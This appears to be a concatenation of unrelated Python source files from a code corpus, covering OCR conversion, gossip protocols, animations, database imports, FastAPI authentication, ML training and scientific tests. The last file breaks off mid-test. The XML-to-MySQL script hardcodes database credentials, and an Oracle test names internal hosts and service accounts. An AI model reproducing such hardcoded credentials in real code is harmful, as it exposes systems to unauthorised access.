image = PilImage.open(source_file)
image.thumbnail(max_size)
image.save(target_file, 'PDF', resolution=100.0)
image.close()
def tif_to_pdf(source_file, target_file, ocr_lang=None):
"""
Make a 1 Paged PDF Document from a tif file.
:param str source_file: path to the jpg
:param str target_file: desired output path
:param ocr_lang: the language used for ocr
"""
if ocr_lang == None:
_to_pdf_without_ocr(source_file, target_file)
else:
ocr_params = {
"language": ocr_lang,
"use_threads": True,
"optimize": 3
}
try:
ocrmypdf.ocr(source_file, target_file, **ocr_params)
except (ocrmypdf.exceptions.UnsupportedImageFormatError, ValueError):
log.info("UnsupportedImageFormatError, trying to convert to RGB.")
tmp_path = f'{os.path.splitext(target_file)[0]}_tmp.tif'
image = PilImage.open(source_file)
rgb_image = image.convert('RGB')
rgb_image.save(tmp_path, dpi=image.info['dpi'])
ocrmypdf.ocr(tmp_path, target_file, **ocr_params)
os.remove(tmp_path)
except ocrmypdf.exceptions.DpiError:
log.error(f'Low dpi image #{source_file}, skipping PDF OCR.')
_to_pdf_without_ocr(source_file, target_file)
def _to_pdf_without_ocr(source_file, target_file, scale=(900, 1200)):
try:
image = PilImage.open(source_file)
image.thumbnail(scale)
image.save(target_file, 'PDF', resolution=100.0)
image.close()
except ValueError:
log.info("Value, trying to convert to RGB.")
image = PilImage.open(source_file)
rgb_image = image.convert('RGB')
rgb_image.save(target_file, 'PDF', resolution=100.0)
image.close()
def tif_to_txt(source_file, target_file, language='eng'):
"""
Extract text from tiff file via OCR and writes to target file.
Availabe languages can be found here:
https://github.com/tesseract-ocr/tesseract/blob/master/doc/tesseract.1.asc#languages
:param str source_file: file path to tiff
:param str target_file: name of generated text-file
:param str language: used by tesseract. Possible values: see above.
"""
if language not in ocr_langs:
log.error(f'language {language} not available. Defaulting to English.')
lang = 'eng'
else:
lang = language
log.debug("Will use lang '%s'" % lang)
image = PilImage.open(source_file)
txt = ocr_tool.image_to_string(
image,
lang=lang,
builder=pyocr.builders.TextBuilder())
image.close()
with open(target_file, 'w') as outfile:
outfile.write(txt)
| 2.84375
| 3
|
txgossip/scuttle.py
|
jrydberg/txgossip
| 5
|
12777680
|
# Copyright (C) 2011 <NAME>
# Copyright (C) 2010 <NAME>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from txgossip.state import PeerState
class Scuttle(object):
def __init__(self, peers, local_peer):
self.peers = peers
self.local_peer = local_peer
def digest(self):
digest = {}
for peer, state in self.peers.items():
digest[peer] = state.max_version_seen
return digest
def scuttle(self, digest):
deltas_with_peer = []
requests = {}
new_peers = []
for peer, digest_version in digest.items():
if not peer in self.peers:
requests[peer] = 0
new_peers.append(peer)
else:
state = self.peers[peer]
if state.max_version_seen > digest_version:
deltas_with_peer.append((
peer,
self.peers[peer].deltas_after_version(digest_version)
))
elif state.max_version_seen < digest_version:
requests[peer] = state.max_version_seen
# Sort by peers with most deltas
def sort_metric(a, b):
return len(b[1]) - len(a[1])
deltas_with_peer.sort(cmp=sort_metric)
deltas = []
for (peer, peer_deltas) in deltas_with_peer:
for (key, value, version) in peer_deltas:
deltas.append((peer, key, value, version))
return deltas, requests, new_peers
def update_known_state(self, deltas):
for peer, key, value, version in deltas:
self.peers[peer].update_with_delta(
str(key), value, version)
def fetch_deltas(self, requests):
deltas = []
for peer, version in requests.items():
peer_deltas = self.peers[peer].deltas_after_version(
version)
for (key, value, version) in peer_deltas:
deltas.append((peer, key, value, version))
return deltas
| 2.0625
| 2
|
generators.py
|
m87/pyEM
| 0
|
12777681
|
<gh_stars>0
import numpy as np
import os
from scipy import linalg
from config import *
def fixed_generator(models, size, init):
clusters = len(models[WEIGHTS])
out=[]
ini = []
labels =[]
n= int(size/clusters)+1
for m in range(clusters):
w=np.random.multivariate_normal(models[MEANS][m],models[COVARS][m],n)
x = [[i,m] for i in w ]
out.extend(x)
ini.append(w[0])
out = tuple(zip(*out))
if init == INIT_RANDOM:
a = np.random.choice(range(len(out[0])), clusters)
ini =[]
for i in a:
ini.append(out[0][i])
return np.array(out[0]),ini, np.array(out[1])
def lim_generator():
pass
| 2.25
| 2
|
parse_xml.py
|
WillMatthews/refmanager
| 1
|
12777682
|
<filename>parse_xml.py
#!/usr/bin/python3
# script to parse an EndNote XML database file, and populate a mysql database with the contents
import xml.etree.ElementTree as Etree
import pymysql
#from termcolor import colored
nums = []
count = 0;
dictList = []
stdDict = {"title":"","author":"","key":"","year":"","abstract":"","keywords":"","volume":"","number":"","pages":"","url":"","comments":""}
root = Etree.parse('old_database.xml').getroot()
for records in root:
for record in records:
newdict = stdDict.copy()
#print("\n\n")
for element in record:
#print(element.tag)
workingtext = ""
ispresent = False
#print(colored(element.tag,"green"))
#if element.text is not None:
# print(" " + element.text)
for part in element:
if part.text is not None:
title = element.tag
workingtext += part.text + " "
ispresent = True
else:
for subpart in part:
#print(colored(subpart.tag,"blue"))
if subpart.text is not None:
title = part.tag
workingtext += subpart.text + " "
ispresent = True
else:
for subsubpart in subpart:
title = subpart.tag
workingtext += subsubpart.text + " "
ispresent = True
if ispresent:
if title == "secondary-title":
title = "title"
elif title == "foreign-keys":
title = "key"
elif title == "keyword":
title = "keywords"
#print(colored(title,"red"))
#print(" " + workingtext)
newdict[title] = workingtext.replace("\r","\n").strip()
count += 1
dictList.append(newdict)
for d in dictList:
print(d)
print("\n\n")
d["key"] = int(d["key"])
nums.append(d["key"])
nums.sort()
print("\n\n")
print("Missing entries between 1 and " + str(max(nums)) + ":")
for i in range(1,max(nums)):
if i not in nums:
print(i)
print("\n")
print(str(count) + " Entries found in DB file")
conn = pymysql.connect(host='localhost', user="will", passwd="will", db='agricoat', charset = 'utf8mb4', cursorclass=pymysql.cursors.DictCursor)
cur = conn.cursor()
sql = """INSERT INTO library (`title`, `author`, `key`, `year`, `abstract`, `keywords`, `volume`, `number`, `pages`, `url`, `comments`) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s,%s);"""
count2 = 0
for d in dictList:
cur.execute(sql,(d["title"],d["author"],d["key"],d["year"],d["abstract"],d["keywords"],d["volume"],d["number"],d["pages"],d["url"],d["comments"],))
conn.commit()
count2 += 1
print("Inserted value " + str(count2) + " of: "+ str(count))
cur.close()
conn.close()
| 3
| 3
|
videos/HomeworkVol03/678-widcardw.py
|
AStarySky/manim_sandbox
| 366
|
12777683
|
<gh_stars>100-1000
# from widcardw
from manimlib.imports import *
class Test6(Scene):
CONFIG = {"camera_config": {"background_color": "#ffffff"}}
def construct(self):
circle0 = Circle(radius=1.5, stroke_color="#559944", plot_depth=-2)
doto = Dot(ORIGIN, color="#000000")
texto = TexMobject("O", color="#000000", background_stroke_color="#ffffff", background_stroke_width=6).next_to(
doto, RIGHT+DOWN, buff=SMALL_BUFF)
self.play(ShowCreation(circle0))
self.play(Write(doto), Write(texto))
dota = Dot(np.array([3.2, 0, 0]), color="#000000", plot_depth=1)
texta = TexMobject("A", color="#000000").next_to(
dota, RIGHT+DOWN, buff=SMALL_BUFF)
self.play(Write(dota), Write(texta))
t = ValueTracker(2)
dotb = Dot(color="#bb3333", plot_depth=1).add_updater(lambda b: b.move_to(np.array([
1.5*np.cos(t.get_value()), 1.5*np.sin(t.get_value()), 0
])))
textb = TexMobject("B", color="#000000", background_stroke_color="#ffffff", background_stroke_width=6).add_updater(
lambda b: b.next_to(dotb, UP+LEFT, buff=SMALL_BUFF))
self.play(Write(dotb), Write(textb))
self.wait(0.2)
l_ab = DashedLine(color="#bb7755", stroke_width=1.5, plot_depth=0).add_updater(
lambda l: l.put_start_and_end_on(dota.get_center(), dotb.get_center()))
self.play(ShowCreation(l_ab))
self.wait(0.2)
self.play(t.increment_value, 1, rate_func=smooth)
self.play(t.increment_value, -3, rate_func=smooth)
l_b = Line(LEFT, RIGHT).add_updater(lambda l: l.become(
Line(color="#55aaee", plot_depth=0).rotate(l_ab.get_angle()+PI/2,
about_point=l_ab.get_start())
.move_to(l_ab.get_end()).scale(20)
))
dotc = Dot(stroke_opacity=0, fill_opacity=0).add_updater(
lambda d: d.move_to(l_b.get_start()))
self.play(ShowCreation(l_b))
self.add(dotc)
anglea = Angle(dota, dotb, dotc)\
.add_updater(lambda a: a.become(Angle(dota, dotb, dotc, color="#E65A4C")))
self.play(ShowCreation(anglea))
for i in range(50):
self.play(t.increment_value, TAU/50,
rate_func=linear, run_time=0.12)
l_b.clear_updaters()
l_b.plot_depth = -1
l_bc = l_b.copy().set_stroke(width=1.5, color="#00aaff")
self.add(l_bc)
l_b.add_updater(lambda l: l.become(
Line(color="#55aaee", plot_depth=0).rotate(l_ab.get_angle()+PI/2,
about_point=l_ab.get_start())
.move_to(l_ab.get_end()).scale(20)
))
self.add(l_b)
anglea.clear_updaters()
l_b.clear_updaters()
self.play(FadeOut(anglea), FadeOut(l_b))
self.wait(3)
class Test7(Scene):
CONFIG = {"camera_config": {"background_color": "#ffffff"}}
def construct(self):
t = ValueTracker(0)
doto = Dot(DOWN*0.6, color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2).scale(0.5)
dotp = Dot(np.array([0, -2.7, 0]), color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2).scale(0.5)
dota = Dot(color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2).scale(0.5).add_updater(lambda d: d.move_to(np.array([
doto.get_center()[0]+np.cos(t.get_value()),
doto.get_center()[1]+np.sin(t.get_value()), 0
])))
cira = Circle().add_updater(lambda c: c.become(
Circle(radius=get_line_long(dotp.get_center(),
dota.get_center()), color="#559944").move_to(dota.get_center())
))
texto = TexMobject(
"O", color="#000000", background_stroke_color="#ffffff", background_stroke_width=6)\
.scale(0.7).next_to(doto, DOWN+RIGHT, buff=SMALL_BUFF)
textp = TexMobject(
"P", color="#000000", background_stroke_color="#ffffff", background_stroke_width=6)\
.scale(0.7).next_to(dotp, DOWN+LEFT, buff=SMALL_BUFF)
texta = TexMobject(
"A", color="#000000", background_stroke_color="#ffffff", background_stroke_width=6)\
.scale(0.7).add_updater(lambda a: a.next_to(dota, DOWN+LEFT, buff=SMALL_BUFF))
ciro = Circle(radius=1, color="#bb7755").move_to(doto.get_center())
dotpc = Dot(color="#000000").scale(0.5).move_to(dotp.get_center())
l_pa = DashedLine(color="#55bb33", stroke_width=1.5).add_updater(lambda l: l.put_start_and_end_on(
dota.get_center(), dotpc.get_center()))
self.play(ShowCreation(ciro), Write(doto), Write(texto))
self.play(Write(dotp), Write(textp))
self.wait(0.3)
self.play(Write(dota), Write(texta))
self.add(dotpc)
self.play(ShowCreation(l_pa))
path = TracedPath(dotpc.get_center,
stroke_color="#559944", stroke_width=3)
self.add(path)
self.play(Rotating(dotpc, about_point=dota.get_center()),
run_time=1.8, rate_func=smooth)
# self.play(ShowCreation(cira))
l_pa.clear_updaters()
self.remove(dotpc, path)
self.play(FadeOut(l_pa), FadeIn(cira))
self.play(t.increment_value, -PI/2)
self.wait(0.3)
for i in range(40):
self.play(t.increment_value, TAU/40,
rate_func=linear, run_time=0.2)
cira.clear_updaters()
ciracpy = cira.copy().set_color("#9944bb").set_stroke(width=1.5)
self.add(ciracpy)
cira.add_updater(lambda c: c.become(
Circle(radius=get_line_long(dotp.get_center(),
dota.get_center()), color="#559944").move_to(dota.get_center())
))
self.add(cira)
#attention: get_line_long is defined by Shy_Vector
#if it does not work, you can turn to "get_norm(...)"
cira.clear_updaters()
self.play(FadeOut(cira))
self.wait(2.5)
class Test8(Scene):
CONFIG = {"camera_config": {"background_color": "#ffffff"}}
def construct(self):
doto = Dot(color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2).scale(0.7)
dota = Dot(LEFT*1.8, color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2).scale(0.7)
dotb = Dot(RIGHT*1.8, color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2).scale(0.7)
texto = TexMobject("O", color="#000000", background_stroke_color="#ffffff",
background_stroke_width=6, plot_depth=2).scale(0.7).next_to(doto, RIGHT+DOWN, buff=SMALL_BUFF)
texta = TexMobject("A", color="#000000", background_stroke_color="#ffffff",
background_stroke_width=6, plot_depth=2).scale(0.7).next_to(dota, LEFT, buff=SMALL_BUFF)
textb = TexMobject("B", color="#000000", background_stroke_color="#ffffff",
background_stroke_width=6, plot_depth=2).scale(0.7).next_to(dotb, RIGHT, buff=SMALL_BUFF)
ciro = Circle(radius=1.8, color="#559944")
l_ab = Line(LEFT*1.8, RIGHT*1.8, color="#4488dd")
self.play(ShowCreation(ciro), Write(doto), Write(texto))
self.play(ShowCreation(l_ab), *[Write(obj)
for obj in [dota, dotb, texta, textb]])
self.wait(0.3)
t = ValueTracker(1)
dotp = Dot(color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2).scale(0.7)\
.add_updater(lambda d: d.move_to(np.array([
1.8*np.cos(t.get_value()), 1.8*np.sin(t.get_value()), 0
])))
textp = TexMobject("P", color="#000000", background_stroke_color="#ffffff",
background_stroke_width=6, plot_depth=2).scale(0.7)\
.add_updater(lambda p: p.next_to(dotp, UP+RIGHT, buff=SMALL_BUFF))
self.play(Write(dotp), Write(textp))
self.wait(0.2)
cirp = Circle(radius=2).add_updater(lambda c: c.become(
Circle(radius=abs(dotp.get_center()[1]), color="#dd7766")
.move_to(dotp.get_center())
))
self.play(ShowCreation(cirp))
self.play(t.increment_value, 1)
self.play(t.increment_value, -2)
self.wait(0.2)
for i in range(40):
self.play(t.increment_value, TAU/40,
rate_func=linear, run_time=0.2)
cirp.clear_updaters()
cirpc = cirp.copy().set_stroke(width=1.5, color="#715582")
self.add(cirpc)
cirp.add_updater(lambda c: c.become(
Circle(radius=abs(dotp.get_center()[1]), color="#dd7766")
.move_to(dotp.get_center())))
self.add(cirp)
cirp.clear_updaters()
textp.clear_updaters()
dotp.clear_updaters()
self.wait()
self.play(*[FadeOut(obj)
for obj in [doto, dota, dotb, texta, textb, textp, textp, dotp, l_ab, ciro, texto]])
self.wait(2)
'''
to be completed...
class Test5(Scene):
CONFIG = {"camera_config": {"background_color": "#ffffff"}}
def construct(self):
dotb = Dot(LEFT*2, color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2)
dotc = Dot(RIGHT*2, color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2)
dota = Dot(LEFT*2+UP*1.3, color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2)
texta = TexMobject("A", color="#000000", background_stroke_color="#ffffff",
background_stroke_width=6, plot_depth=2).next_to(dota, UP+LEFT, buff=SMALL_BUFF)
textb = TexMobject("B", color="#000000", background_stroke_color="#ffffff",
background_stroke_width=6, plot_depth=2).next_to(dotb, LEFT+DOWN, buff=SMALL_BUFF)
textc = TexMobject("C", color="#000000", background_stroke_color="#ffffff",
background_stroke_width=6, plot_depth=2).next_to(dotc, RIGHT+DOWN, buff=SMALL_BUFF)
l_ab = Line(color="#559944")\
.put_start_and_end_on(dota.get_center(), dotb.get_center())
l_bc = Line(color="#559944")\
.put_start_and_end_on(dotc.get_center(), dotb.get_center())
self.play(*[ShowCreation(obj)
for obj in [l_ab, l_bc, dota, dotb, dotc]])
self.play(*[Write(obj) for obj in [texta, textb, textc]])
self.wait(0.3)
t = ValueTracker(0)
def p_pos(t):
return np.array([0, 0, 0])
dotp = Dot(color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2)\
.add_updater(lambda d: d.move_to())'''
| 2.109375
| 2
|
modules/pymol/embed/epymol/__init__.py
|
hryknkgw/pymolwin
| 2
|
12777684
|
from pymol.embed import EmbeddedPyMOL
class ePyMOL(EmbeddedPyMOL):
def __init__(self):
self.ep_init()
# initial mouse position
self.lastx = self.x = 30
self.lasty = self.y = 30
def SetSize(self, width, height):
self.ep_reshape(width,height)
def OnChar(self,code):
self.ep_char(0,0,code,0,0,0)
def OnSpecial(self,code):
self.ep_special(0,0,code,0,0,0)
def OnPaint(self):
self.OnDraw()
def OnMouseDown(self,*arg):
self.ep_mouse_down(*arg)
def OnMouseUp(self,*arg):
self.ep_mouse_up(*arg[0:2])
def OnMouseMotion(self,*arg):
self.ep_motion(*arg)
def OnDraw(self):
self.ep_draw()
def OnIdle(self):
self.ep_idle()
def GetRedisplay(self):
return self.ep_get_redisplay()
def CheckPyMOL(self):
pass
#if self.ep_get_redisplay():
# self.Repaint()
def Repaint(self):
pass
| 2.765625
| 3
|
testes/teste_Conexao_Oracle.py
|
almirjgomes/DE_DataBaseConnect
| 0
|
12777685
|
<filename>testes/teste_Conexao_Oracle.py
import pandas as pd
import DE_DataBase as dtb
db = dtb.DATABASE()
def teste_ORACLE():
try:
monterey = {"database": "Oracle",
"name_conection": "MONTEREY",
"path_library": None,
"instance": None,
"host": "brlsplporc-scan.DASA.NET",
"port": "1521",
"service_name": "DASABI",
"sid": None,
"username": "monterey",
"password": "<PASSWORD>"
}
gliese = {"database": "Oracle",
"name_conection": "GLIESE",
"path_library": None,
"instance": None,
"host": "brlsplprdb01.dasa.net",
"port": "1521",
"service_name": None,
"sid": "stbpsoracle1",
"username": "svc_bi",
"password": "<PASSWORD>"
}
engine = db.ORACLE(gliese)
sql = "select sysdate from dual"
df = pd.read_sql(sql, engine)
print(df)
msg = "Conexao bem sucedida"
except Exception as error:
msg = error
finally:
print(msg)
if __name__ == "__main__":
teste_ORACLE()
| 2.484375
| 2
|
src/routers/rotas_auth.py
|
daianasousa/Projeto-BLX
| 0
|
12777686
|
<filename>src/routers/rotas_auth.py
from fastapi import APIRouter, status, Depends, HTTPException
from typing import List
from sqlalchemy.orm import Session
from src.schemas.schemas import Usuario, UsuarioSimples, LoginSucesso, LoginData
from src.infra.sqlalchemy.config.database import get_db
from src.infra.sqlalchemy.repositorios.repositorio_usuario \
import RepositorioUsuario
from src.infra.providers import hash_provider, token_provider
from src.routers.auth_utils import obter_usuario_logado
router = APIRouter()
@router.post('/signup',
status_code=status.HTTP_201_CREATED,
response_model=UsuarioSimples)
def signup(usuario: Usuario, session: Session = Depends(get_db)):
# verificar se já existe usuário para telefone
usuario_localizado = RepositorioUsuario(
session).obter_por_telefone(usuario.telefone)
if usuario_localizado:
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST,
detail="Já existe um usuário para esse telefone")
# criar novo usuario
usuario.senha = hash_provider.gerar_hash(usuario.senha)
usuario_criado = RepositorioUsuario(session).criar(usuario)
return usuario_criado
@router.post('/token', response_model=LoginSucesso)
def login(login_data: LoginData, session: Session = Depends(get_db)):
senha = login_data.senha
telefone = login_data.telefone
usuario = RepositorioUsuario(session).obter_por_telefone(telefone)
if not usuario:
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST,
detail='Telefone ou senha estão incorrentes!')
senha_valida = hash_provider.verificar_hash(senha, usuario.senha)
if not senha_valida:
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST,
detail='Telefone ou senha estão incorrentes!')
# Gerar Token JWT
token = token_provider.criar_access_token({'sub': usuario.telefone})
return LoginSucesso(usuario=usuario, access_token=token)
@router.get('/me', response_model=UsuarioSimples)
def me(usuario: Usuario = Depends(obter_usuario_logado)):
return usuario
| 2.484375
| 2
|
solution/lc033.py
|
sth4nothing/pyleetcode
| 0
|
12777687
|
class Solution(object):
def search(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
import bisect
if not nums:
return -1
n = len(nums)
k = n
for i in range(1, n):
if nums[i - 1] > nums[i]:
k = i
break
r = (0, k) if target >= nums[0] else (k, n)
idx = bisect.bisect_left(nums, target, *r)
if 0 <= idx < n and nums[idx] == target:
return idx
return -1
| 3.34375
| 3
|
assertpy/__init__.py
|
santunioni/assertpy
| 246
|
12777688
|
from __future__ import absolute_import
from .assertpy import assert_that, assert_warn, soft_assertions, fail, soft_fail, add_extension, remove_extension, WarningLoggingAdapter, __version__
from .file import contents_of
| 1.085938
| 1
|
src/practitioner/classify_ai4i2020.py
|
jpastorino/Data-Blind-ML
| 0
|
12777689
|
<gh_stars>0
import numpy as np
import sklearn as scikit
import tensorflow as tf
from preprocessing import Preprocessing
from evaluation import EvaluationClient
from sklearn.model_selection import train_test_split
# #####################################################################################################################
# Implementation of Pre-Processing
# #####################################################################################################################
class MyPreprocess(Preprocessing):
def prepare(self, in_data):
from sklearn.preprocessing import OneHotEncoder
x = in_data[:, 2:8]
ohe = OneHotEncoder()
sample_type = ohe.fit_transform(x[:, 0].reshape(-1, 1)).toarray()
x = np.append(x, sample_type, axis=1)
x = np.delete(x, 0, axis=1)
x = np.asarray(x).astype('float32')
x = scikit.preprocessing.normalize(x)
y = in_data[:, 8].astype('float32')
return x, y
if __name__ == "__main__":
print(f"""Using Tensorflow version {tf.__version__}""")
# ------------------------------------------------------------------------------------------------------------------
# LOADING DATA
data_synthetic = np.load("../../data/generated/ai4i2020_synt.npz", allow_pickle=True)
data_synthetic = data_synthetic["data"]
print(f"""Ai4i Synthetic data shape:{data_synthetic.shape}""")
# ------------------------------------------------------------------------------------------------------------------
# Preprocessing
pre_proc = MyPreprocess()
x, y = pre_proc.prepare(data_synthetic)
print(f"""Preprocessed data: x:{x.shape}, y:{y.shape}""")
x_train, x_test, y_train, y_test = train_test_split(x, y)
print(f"""Train: x:{x_train.shape}, y:{y_train.shape}. Test: x:{x_test.shape}, y:{y_test.shape}""")
# ------------------------------------------------------------------------------------------------------------------
# DEFINING THE MODEL AND TRAINING
model = tf.keras.models.Sequential(name="AI4I_Synthetic")
model.add(tf.keras.layers.Dense(units=150, name="dense1", input_shape=[8]))
model.add(tf.keras.layers.Dropout(0.8, name="dropout_1"))
model.add(tf.keras.layers.Dense(units=150, name="dense2"))
model.add(tf.keras.layers.Dropout(0.8, name="dropout_2"))
model.add(tf.keras.layers.Dense(3, activation=tf.nn.softmax, name="dense3_softmax"))
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=["accuracy"])
# ------------------------------------------------------------------------------------------------------------------
# Training
model.fit(x_train, y_train, batch_size=8, epochs=15)
# ------------------------------------------------------------------------------------------------------------------
# Local Evaluation
print()
print(f"={'Evaluating using synthetic data':^78}=")
print(model.evaluate(x_test, y_test))
# ------------------------------------------------------------------------------------------------------------------
# Remote Evaluation
eval = EvaluationClient("goliath.ucdenver.pvt", 35000)
eval.evaluate_model("079A7", "AI4ISynthetic", model, pre_proc)
| 2.6875
| 3
|
src/main/python/coding_problems/bs_detect_the_only_duplicate_in_list.py
|
ikumen/today-i-learned
| 0
|
12777690
|
<reponame>ikumen/today-i-learned
"""
You are given a list nums of length n + 1 picked from the range 1, 2, ..., n. By the pigeonhole principle, there must be a duplicate. Find and return it. There is guaranteed to be exactly one duplicate.
Bonus: Can you do this in \mathcal{O}(n)O(n) time and \mathcal{O}(1)O(1) space?
Constraints
n ≤ 10,000
https://binarysearch.com/problems/Detect-the-Only-Duplicate-in-a-List
"""
class Solution:
def solve2(self, nums):
unique = set()
for n in nums:
if n in unique:
return n
unique.add(n)
return None
def solve(self, nums):
# given sum of natural numbers 1..n = n(n+1)/2
n = len(nums)-1
s = sum(nums)
return s - ((n * (n + 1)) // 2)
| 3.578125
| 4
|
rl_agents/trainer/logger.py
|
neskoc/rl-agents
| 342
|
12777691
|
<reponame>neskoc/rl-agents<gh_stars>100-1000
import json
import logging.config
from pathlib import Path
import gym
from rl_agents.configuration import Configurable
logging_config = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"standard": {
"format": "[%(levelname)s] %(message)s "
},
"detailed": {
"format": "[%(name)s:%(levelname)s] %(message)s "
}
},
"handlers": {
"default": {
"level": "INFO",
"formatter": "standard",
"class": "logging.StreamHandler"
}
},
"loggers": {
"": {
"handlers": [
"default"
],
"level": "DEBUG",
"propagate": True
}
}
}
def configure(config={}, gym_level=gym.logger.INFO):
"""
Configure logging.
Update the default configuration by a configuration file.
Also configure the gym logger.
:param config: logging configuration, or path to a configuration file
:param gym_level: desired level for gym logger
"""
if config:
if isinstance(config, str):
with Path(config).open() as f:
config = json.load(f)
Configurable.rec_update(logging_config, config)
logging.config.dictConfig(logging_config)
gym.logger.set_level(gym_level)
def add_file_handler(file_path):
"""
Add a file handler to the root logger.
:param Path file_path: log file path
"""
configure({
"handlers": {
file_path.name: {
"class": "logging.FileHandler",
"filename": file_path,
"level": "DEBUG",
"formatter": "detailed",
"mode": 'w'
}
},
"loggers": {
"": {
"handlers": [
file_path.name,
*logging_config["handlers"]
]
}
}
})
| 2.359375
| 2
|
source/gui/test/test_1dvar.py
|
bucricket/projectMAScorrection
| 0
|
12777692
|
<reponame>bucricket/projectMAScorrection
'''
Created on May 7, 2014
@author: pascale
'''
import unittest
import rmodel
import logging
import rttovgui_unittest_class
import r1Dvar
class Test(rttovgui_unittest_class.RttovGuiUnitTest):
def setUp(self):
level_logging = logging.DEBUG
self.p = rmodel.project.Project()
logging.basicConfig(filename=(self.p.config.ENV['GUI_WRK_DIR'] +
"/rttovgui_unittest_test_1dvar.log"),
format="[%(asctime)s] %(levelname)s "
"[%(module)s:%(funcName)s:%(lineno)d] %(message)s",
level=level_logging,
datefmt="%Y:%m:%d %H:%M:%S",
filemode="w")
def test_1dvar_backround(self):
filename = "../r1Dvar/data/Sample_Background/BACKGROUND_43L.dat"
PBg = r1Dvar.r1dvar.Background()
PBg.read(filename)
PBg.print_data()
prof = PBg.toProfile()
nlev = prof["NLEVELS"]
self.assertGreater(prof["P"][10], prof["P"][0], "comparaison P")
self.assertGreater(prof["Q"][nlev - 1], prof["Q"][0], "comparaison Q")
PBg.print_data()
print ("-> profile : ")
prof.display()
def test_2profile(self):
print ">>> test_2profile"
p = rmodel.project.Project()
filename = p.config.ENV[
"RTTOV_GUI_PROFILE_DIR"] + "/standard54lev_allgas.H5"
p.openProfile(filename, 1)
nlevels = p.myProfile["NLEVELS"]
pbis = rmodel.project.Project()
pbis.openProfile(filename, 2)
vector = p.myProfile.to1DvarVect()
newprofile = r1Dvar.r1dvar.vector2profile(vector, pbis.myProfile)
vector2 = newprofile.to1DvarVect()
print "vector"
print vector
print "vector2"
print vector2
print "vector-vector2"
print vector - vector2
for i in range(len(vector)):
self.assertEquals(vector[i], vector2[i])
# verify vector2 and vector are not the same memory
vector[:] = 1
for i in range(nlevels):
self.assertNotEqual(newprofile["T"][i], vector[i])
for i in range(nlevels - 29, nlevels):
self.assertNotEqual(newprofile["Q"][i], vector[
nlevels + i - nlevels + 29])
self.assertNotEqual(newprofile["S2M"]["T"], vector[nlevels + 29])
self.assertNotEqual(newprofile["S2M"]["Q"], vector[nlevels + 29 + 1])
self.assertNotEqual(newprofile["SKIN"]["T"], vector[nlevels + 29 + 2])
print "newprofile[Q]"
print newprofile["Q"]
print (newprofile["S2M"]["T"], vector[nlevels + 29])
# verify vector2 and pbis are not the same memory
pbis.myProfile["T"][:] = 2
pbis.myProfile["Q"][:] = 0
pbis.myProfile["S2M"]["T"] = 0
pbis.myProfile["S2M"]["Q"] = 0
pbis.myProfile["SKIN"]["T"] = 0
for i in range(nlevels):
self.assertNotEqual(newprofile["T"][i], pbis.myProfile["T"][i])
for i in range(nlevels):
self.assertNotEqual(newprofile["Q"][i], pbis.myProfile["Q"][i])
self.assertNotEqual(newprofile["S2M"]["T"], pbis.myProfile["S2M"]["T"])
self.assertNotEqual(newprofile["S2M"]["Q"], pbis.myProfile["S2M"]["Q"])
self.assertNotEqual(newprofile["SKIN"][
"T"], pbis.myProfile["SKIN"]["T"])
def test_2vector(self):
print (">>> test_2vector")
print (" a vector contains only T values, lnq bottom lnq vales ,"
" Tsurf, lnq surf and Tskin")
print (" temperature, and ln q are stored"
" from top of atmosphere to ground ")
p = rmodel.project.Project()
filename = p.config.ENV[
"RTTOV_GUI_PROFILE_DIR"] + "/standard54lev_allgas.H5"
p.openProfile(filename, 1)
vector = p.myProfile.to1DvarVect()
print ("T:")
print (p.myProfile["T"])
print ("Q:")
print (p.myProfile["Q"])
print (p.myProfile["S2M"]["T"])
print (p.myProfile["S2M"]["Q"])
print (p.myProfile["SKIN"]["T"])
print ('vector')
print(vector)
nlevels = p.myProfile["NLEVELS"]
self.assertEqual(vector[0], p.myProfile["T"][0])
self.assertEqual(vector[nlevels - 1], p.myProfile["T"][nlevels - 1])
self.assertEqual(vector[nlevels + 29 - 1],
p.myProfile["Q"][nlevels - 1])
self.assertEqual(vector[nlevels], p.myProfile["Q"][nlevels - 29])
# verify p.myProfile and vector are not linked
p.myProfile["T"][0] = -1
p.myProfile["Q"][nlevels - 1] = -1
self.assertNotEqual(vector[0], p.myProfile["T"][0])
self.assertNotEqual(vector[nlevels + 29 - 1],
p.myProfile["Q"][nlevels - 1])
def test_1dvar_Rmatrices(self):
print (">>> test_1dvar_Rmatrices")
# test Rmatrices
